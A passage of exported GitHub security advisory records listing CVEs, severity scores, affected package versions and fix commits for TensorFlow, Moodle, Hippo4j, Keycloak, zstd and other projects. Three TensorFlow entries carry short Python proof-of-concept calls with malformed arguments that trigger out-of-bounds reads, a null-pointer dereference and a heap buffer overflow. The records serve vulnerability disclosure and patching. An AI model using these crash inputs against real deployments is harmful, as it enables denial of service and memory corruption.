When axis is larger than the dim of input, c->Dim(input,axis) goes out of bound.
Same problem occurs in the QuantizeAndDequantizeV2/V3/V4/V4Grad operations too.
```python
import tensorflow as tf
@tf.function
def test():
tf.raw_ops.QuantizeAndDequantizeV2(input=[2.5],
input_min=[1.0],
input_max=[10.0],
signed_input=True,
num_bits=1,
range_given=True,
round_mode='HALF_TO_EVEN',
narrow_range=True,
axis=0x7fffffff)
test()
```
### Patches
We have patched the issue in GitHub commit [7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb](https://github.com/tensorflow/tensorflow/commit/7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb).
The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gw97-ff7c-9v96'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25668'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
|
{'cwe_ids': ['CWE-122', 'CWE-125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:57:01Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
|
1.4.0
|
GHSA-5gp5-vxj6-4257
|
2023-03-13T19:18:27Z
|
2023-03-07T00:30:24Z
| null |
['CVE-2022-4134']
|
OpenStack Glance Inclusion of Functionality from Untrusted Control Sphere vulnerability
|
A flaw was found in openstack-glance. This issue could allow a remote, authenticated attacker to tamper with images, compromising the integrity of virtual machines created using these modified images.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'glance'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '25.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-0757'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4134'}, {'type': 'WEB', 'url': 'https://bugs.launchpad.net/glance/+bug/1990157'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2147462'}, {'type': 'PACKAGE', 'url': 'https://github.com/openstack/glance'}, {'type': 'WEB', 'url': 'https://wiki.openstack.org/wiki/OSSN/OSSN-0090'}]
|
{'cwe_ids': ['CWE-829'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T00:16:31Z', 'nvd_published_at': '2023-03-06T23:15:00Z'}
|
1.4.0
|
GHSA-wxmq-v9gx-75pg
|
2023-03-28T22:54:23Z
|
2023-03-23T21:30:18Z
| null |
['CVE-2023-28335']
|
Moodle vulnerable to Cross-site Request Forgery
|
The link to reset all templates of a database activity did not include the necessary token to prevent a CSRF risk.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28335'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/355556c05f4a6d9e223164eff820cd34eb70cc35'}, {'type': 'WEB', 'url': 'https://git.moodle.org/gw?p=moodle.git;a=commitdiff;h=355556c05f4a6d9e223164eff820cd34eb70cc35'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=445067'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T23:08:33Z', 'nvd_published_at': '2023-03-23T21:15:00Z'}
|
1.4.0
|
GHSA-r76w-3wwq-jv6v
|
2023-03-14T23:01:26Z
|
2023-03-07T00:30:24Z
| null |
['CVE-2023-27891']
|
Insufficient Session Expiration in pretix
|
rami.io pretix before 4.17.1 allows OAuth application authorization from a logged-out session. The fixed versions are 4.15.1, 4.16.1, and 4.17.1.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'pretix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.17.0'}, {'fixed': '4.17.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'pretix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.16.0'}, {'fixed': '4.16.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'pretix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.15.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27891'}, {'type': 'PACKAGE', 'url': 'https://github.com/thufschmitt/pretix-nix'}, {'type': 'WEB', 'url': 'https://pretix.eu/about/en/blog/20230306-release-4171/'}]
|
{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T23:01:26Z', 'nvd_published_at': '2023-03-06T23:15:00Z'}
|
1.4.0
|
GHSA-r95w-7cpx-h5mx
|
2023-03-24T17:12:43Z
|
2023-03-21T06:30:17Z
| null |
['CVE-2023-1542']
|
Answer vulnerable to Business Logic Errors
|
Business Logic Errors in GitHub repository answerdev/answer prior to 1.0.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1542'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/4ca2429d190a6e614f5bbee1173c80a7cffcc568'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d947417c-5a12-407a-9a2f-fa696f65126f'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:31:47Z', 'nvd_published_at': '2023-03-21T05:15:00Z'}
|
1.4.0
|
GHSA-vpqv-mqvc-pcx2
|
2023-03-16T18:35:11Z
|
2023-03-16T18:35:11Z
| null |
['CVE-2014-4920']
|
Reflective Cross-site Scripting Vulnerability in twitter-bootstrap-rails
|
The twitter-bootstrap-rails Gem for Rails contains a flaw that enables a
reflected cross-site scripting (XSS) attack. This flaw exists because the
bootstrap_flash helper method does not validate input when handling flash
messages before returning it to users. This may allow a context-dependent
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship between
their browser and the server.
|
[]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'twitter-bootstrap-rails'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/twitter-bootstrap-rails/CVE-2014-4920.yml'}, {'type': 'WEB', 'url': 'https://nvisium.com/blog/2014/03/28/reflected-xss-vulnerability-in-twitter'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T18:35:11Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-64jg-wjww-7c5w
|
2023-03-27T21:58:55Z
|
2023-03-24T21:58:15Z
| null |
['CVE-2023-25663']
|
TensorFlow has Null Pointer Error in TensorArrayConcatV2
|
### Impact
When ctx->step_containter() is a null ptr, the Lookup function will be executed with a null pointer.
```python
import tensorflow as tf
tf.raw_ops.TensorArrayConcatV2(handle=['a', 'b'], flow_in = 0.1, dtype=tf.int32, element_shape_except0=1)
```
### Patches
We have patched the issue in GitHub commit [239139d2ae6a81ae9ba499ad78b56d9b2931538a](https://github.com/tensorflow/tensorflow/commit/239139d2ae6a81ae9ba499ad78b56d9b2931538a).
The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Yu Tian
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-64jg-wjww-7c5w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25663'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/239139d2ae6a81ae9ba499ad78b56d9b2931538a'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
|
{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:58:15Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
|
1.4.0
|
GHSA-vfvj-3m3g-m532
|
2023-03-13T20:53:50Z
|
2023-03-13T20:53:50Z
| null |
['CVE-2023-27483']
|
fieldpath's Paved.SetValue allows growing arrays up to arbitrary sizes in crossplane-runtime
|
### Summary
Fuzz testing on `crossplane/crossplane`, by Ada Logics and sponsored by the CNCF, identified input to a function in the `fieldpath` package that can cause an out of memory panic. Applications that use the `Paved` type's `SetValue` method with user provided input without proper validation might use excessive amounts of memory and cause an out of memory panic.
### Details
In the `fieldpath` package, the `SetValue` method of the `Paved` type sets a value on the inner object according to the provided path, without validating it first. This allows setting values in slices at any specific index and the code will grow the target array up to the required size. The index is currently capped at max uint32 (4294967295) given how indexes are parsed, but that is still an unnecessarily large value.
### Workaround
Users can parse and validate the path before passing it to the `SetValue` method of the `Paved` type, constraining the index size as deemed appropriate.
### Credits
Disclosed by Ada Logics in a fuzzing audit sponsored by CNCF.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/crossplane/crossplane-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.17.0'}, {'fixed': '0.19.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/crossplane/crossplane-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.6.0'}, {'fixed': '0.16.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/crossplane/crossplane-runtime/security/advisories/GHSA-vfvj-3m3g-m532'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27483'}, {'type': 'WEB', 'url': 'https://github.com/crossplane/crossplane-runtime/commit/53508a9f4374604db140dd8ab2fa52276441e738'}, {'type': 'WEB', 'url': 'https://github.com/crossplane/crossplane-runtime/commit/f67177024d906aaf5e13ee7cd470b4e87a9fef40'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossplane/crossplane-runtime'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1623'}]
|
{'cwe_ids': ['CWE-20', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:53:50Z', 'nvd_published_at': '2023-03-09T21:15:00Z'}
|
1.4.0
|
GHSA-5c9c-6x87-f9vm
|
2023-06-06T01:53:37Z
|
2023-03-31T21:30:37Z
| null |
['CVE-2022-4899']
|
zstd vulnerable to buffer overrun
|
A vulnerability was found in zstd v1.4.10, where an attacker can supply an empty string as an argument to the command line tool to cause buffer overrun.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/facebook/zstd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'zstd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.4.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4899'}, {'type': 'WEB', 'url': 'https://github.com/facebook/zstd/issues/3200'}, {'type': 'WEB', 'url': 'https://github.com/facebook/zstd/pull/3220'}, {'type': 'WEB', 'url': 'https://github.com/sergey-dryabzhinsky/python-zstd/commit/c8a619aebdbd6b838fbfef6e19325a70f631a4c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/facebook/zstd'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/zstd/PYSEC-2023-121.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C63HAGVLQA6FJNDCHR7CNZZL6VSLILB2/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JEHRBBYYTPA4DETOM5XAKGCP37NUTLOA/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QYLDK6ODVC4LJSDULLX6Q2YHTFOWABCN/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230725-0005/'}]
|
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:53:37Z', 'nvd_published_at': '2023-03-31T20:15:00Z'}
|
1.4.0
|
GHSA-4p4m-5qp7-479x
|
2023-04-07T22:37:43Z
|
2023-03-31T03:30:31Z
| null |
['CVE-2023-1753']
|
phpMyFAQ has weak password requirements
|
Weak password requirements in GitHub repository thorsten/phpmyfaq prior to 3.1.12.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1753'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/f612a72494080e04947da7028340fee4493fe8a5'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/01d6ae23-3a8f-42a8-99f4-10246187d71b'}]
|
{'cwe_ids': ['CWE-521'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:43:05Z', 'nvd_published_at': '2023-03-31T01:15:00Z'}
|
1.4.0
|
GHSA-h855-6hph-v363
|
2023-03-31T22:43:40Z
|
2023-03-27T15:30:17Z
| null |
['CVE-2023-27096']
|
Hippo4j allows attacker to obtain sensitive info via ConfigVerifyController function of Tenant Management module
|
Insecure Permissions vulnerability found in OpenGoofy Hippo4j v.1.4.3 allows attacker to obtain sensitive information via the ConfigVerifyController function of the Tenant Management module.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'cn.hippo4j:hippo4j-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27096'}, {'type': 'WEB', 'url': 'https://github.com/opengoofy/hippo4j/issues/1060'}, {'type': 'PACKAGE', 'url': 'https://github.com/opengoofy/hippo4j'}]
|
{'cwe_ids': ['CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:43:40Z', 'nvd_published_at': '2023-03-27T14:15:00Z'}
|
1.4.0
|
GHSA-79jp-m64f-pgrc
|
2023-03-13T19:15:59Z
|
2023-03-07T00:30:26Z
| null |
['CVE-2021-36399']
|
Moodle Cross-site Scripting vulnerability
|
In Moodle, ID numbers displayed in the quiz override screens required additional sanitizing to prevent a stored XSS risk.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0-beta'}, {'fixed': '3.11.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0-beta'}, {'fixed': '3.10.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.8'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36399'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=424805'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:22:19Z', 'nvd_published_at': '2023-03-06T22:15:00Z'}
|
1.4.0
|
GHSA-32gr-4cq6-5w5q
|
2023-03-13T19:18:32Z
|
2023-03-01T18:02:28Z
| null |
['CVE-2023-26491']
|
rsshub vulnerable to Cross-site Scripting via unvalidated URL parameters
|
### Impact
When the URL parameters contain certain special characters, it returns an error page that does not properly handle XSS vulnerabilities, allowing for the execution of arbitrary JavaScript code.
Users who access the deliberately constructed URL are affected.
### Patches
This vulnerability was fixed in version c910c4d28717fb860fbe064736641f379fab2c91. Please upgrade to this or a later version.
### Workarounds
No.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'rsshub'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-master.c910c4d'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/security/advisories/GHSA-32gr-4cq6-5w5q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26491'}, {'type': 'WEB', 'url': 'https://github.com/DIYgod/RSSHub/commit/c910c4d28717fb860fbe064736641f379fab2c91'}, {'type': 'PACKAGE', 'url': 'https://github.com/DIYgod/RSSHub'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T18:02:28Z', 'nvd_published_at': '2023-03-03T23:15:00Z'}
|
1.4.0
|
GHSA-6hg6-5c2q-7rcr
|
2023-03-27T22:00:19Z
|
2023-03-24T21:58:04Z
| null |
['CVE-2023-25664']
|
TensorFlow has Heap-buffer-overflow in AvgPoolGrad
|
### Impact
```python
import os
os.environ['TF_ENABLE_ONEDNN_OPTS'] = '0'
import tensorflow as tf
print(tf.__version__)
with tf.device("CPU"):
ksize = [1, 40, 128, 1]
strides = [1, 128, 128, 30]
padding = "SAME"
data_format = "NHWC"
orig_input_shape = [11, 9, 78, 9]
grad = tf.saturate_cast(tf.random.uniform([16, 16, 16, 16], minval=-128, maxval=129, dtype=tf.int64), dtype=tf.float32)
res = tf.raw_ops.AvgPoolGrad(
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
orig_input_shape=orig_input_shape,
grad=grad,
)
```
### Patches
We have patched the issue in GitHub commit [ddaac2bdd099bec5d7923dea45276a7558217e5b](https://github.com/tensorflow/tensorflow/commit/ddaac2bdd099bec5d7923dea45276a7558217e5b).
The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by <evn@google.com>
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6hg6-5c2q-7rcr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25664'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ddaac2bdd099bec5d7923dea45276a7558217e5b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
|
{'cwe_ids': ['CWE-120', 'CWE-122'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:58:04Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
|
1.4.0
|
GHSA-xg89-vvwp-9c27
|
2023-03-21T18:59:51Z
|
2023-03-16T03:30:16Z
| null |
['CVE-2023-27095']
|
Exposure of Sensitive Information in OpenGoofy Hippo4j
|
Insecure Permissions vulnerability found in OpenGoofy Hippo4j v.1.4.3 allows attacker toescalate privileges via the AddUser method of the UserController function in Tenant Management module.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'cn.hippo4j:hippo4j-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27095'}, {'type': 'WEB', 'url': 'https://github.com/opengoofy/hippo4j/issues/1061'}]
|
{'cwe_ids': ['CWE-200', 'CWE-732'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T18:35:22Z', 'nvd_published_at': '2023-03-16T02:15:00Z'}
|
1.4.0
|
GHSA-vxhr-p2vp-7gf8
|
2023-03-13T15:32:36Z
|
2023-03-07T09:30:30Z
| null |
['CVE-2023-1239']
|
Answer vulnerable to Cross-site Scripting
|
Cross-site Scripting (XSS) - Reflected in GitHub repository answerdev/answer prior to 1.0.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1239'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/9870ed87fb24ed468aaf1e169c2d028e0f375106'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3a22c609-d2d8-4613-815d-58f5990b8bd8'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:11:18Z', 'nvd_published_at': '2023-03-07T08:15:00Z'}
|
1.4.0
|
GHSA-fvx4-8h2x-gm9q
|
2023-03-27T22:13:33Z
|
2023-03-23T18:30:18Z
| null |
['CVE-2023-27094']
|
Hippo4j privilege escalation issue
|
An issue found in OpenGoofy Hippo4j v.1.4.3 allows attackers to escalate privileges via the ThreadPoolController of the tenant Management module.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'cn.hippo4j:hippo4j-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27094'}, {'type': 'WEB', 'url': 'https://github.com/opengoofy/hippo4j/issues/1059'}, {'type': 'PACKAGE', 'url': 'https://github.com/opengoofy/hippo4j'}, {'type': 'WEB', 'url': 'https://github.com/opengoofy/hippo4j/blob/develop/hippo4j-server/hippo4j-console/src/main/java/cn/hippo4j/console/controller/ThreadPoolController.java'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T19:48:52Z', 'nvd_published_at': '2023-03-23T17:15:00Z'}
|
1.4.0
|
GHSA-m4fv-gm5m-4725
|
2023-04-10T16:25:41Z
|
2023-03-01T17:58:01Z
| null |
['CVE-2022-1274']
|
HTML Injection in Keycloak Admin REST API
|
The `execute-actions-email` endpoint of the Keycloak Admin REST API allows a malicious actor to send emails containing phishing links to Keycloak users.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.0.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-m4fv-gm5m-4725'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-1274'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/pull/16764'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/fc3c61235fa30132123c17ed8702ff7b3a672fe9'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2073157'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T17:58:01Z', 'nvd_published_at': '2023-03-29T21:15:00Z'}
|
1.4.0
|
GHSA-7x96-2w32-w3gw
|
2023-03-30T22:17:00Z
|
2023-03-23T21:30:19Z
| null |
['CVE-2022-3101']
|
tripleo-ansible may disclose important configuration details from an OpenStack deployment
|
A flaw was found in tripleo-ansible. Due to an insecure default configuration, the permissions of a sensitive file are not sufficiently restricted. This flaw allows a local attacker to use brute force to explore the relevant directory and discover the file, leading to information disclosure of important configuration details from the OpenStack deployment.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'tripleo-ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-3101'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2022-3101'}, {'type': 'PACKAGE', 'url': 'https://github.com/openstack/tripleo-ansible'}]
|
